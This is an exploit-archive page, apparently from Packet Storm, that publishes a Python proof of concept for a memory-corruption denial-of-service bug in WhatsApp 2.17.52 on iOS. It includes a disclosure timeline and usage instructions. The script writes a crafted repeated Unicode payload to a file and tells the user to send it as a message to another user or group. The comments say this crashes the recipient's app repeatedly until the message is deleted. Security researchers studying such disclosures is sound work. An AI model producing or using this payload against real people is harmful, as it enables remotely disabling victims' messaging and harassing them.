Exploit the possiblities

WhatsApp 2.17.52 Memory Corruption

WhatsApp 2.17.52 Memory Corruption
Posted Nov 1, 2017
Authored by Juan Sacco

WhatsApp versions 2.17.52 and below suffer from a memory corruption vulnerability that can result in a denial of service.

tags | exploit, denial of service
MD5 | 52cf023f313d359776c21c2b3eebd1fb

WhatsApp 2.17.52 Memory Corruption

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Found this and more exploits on my open source security project:
http://www.exploitpack.com
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team -
http://www.kpn.com
# Date and time of release: 11 October 2017
#
# Tested on: iPhone 5/6s iOS 10.3.3 and 11
#
# Description:
# WhatsApp 2.17.52 and prior is prone to a remote memory corruption.
# This type of attacks are possible if the program uses memory
inefficiently and does not impose limits on the amount of state used
when necessary.
#
# Impact:
# Resource exhaustion attacks exploit a design deficiency. An attacker
could exploit this vulnerability to remotely corrupt the memory of the
application forcing an uhandled exception
# in the context of the application that could potentially result in a
denial-of-service condition and/or remote memory corruption.
#
# Warning note:
# Once a user receives the offending message it will automatically
crash the application and if its restarted it will crash again until
the message its manually removed from the user's history.
#
# Timeline:
# 09/13/2017 - Research started
# 09/13/2017 - First proof of concept
# 09/15/2017 - Reported to Whatsapp
# 09/20/2017 - Report Triaged by Facebook
# 11/01/2017 - Facebook never replied back with a status fix
# 11/01/2017 - Disclosure as zero day
# Vendor homepage: http://www.whatsapp.com

import sys
reload(sys)

def whatsapp(filename):
sys.setdefaultencoding("utf-8")
payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 1337
sutf8 = payload.encode('UTF-8')
print "[*] Writing to file: " + filename
open(filename, 'w').write(payload)
print "[*] Done."

def howtouse():
print "Usage: whatsapp.py [FILENAME]"
print "[*] Mandatory arguments:"
print "[-] FILENAME"
sys.exit(-1)

if __name__ == "__main__":
try:
print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by
Juan Sacco"
print "[*] How to use: Copy the content of the file and send
it as a message to another whatsapp user or group"
whatsapp(sys.argv[1])
except IndexError:
howtouse()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    10 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close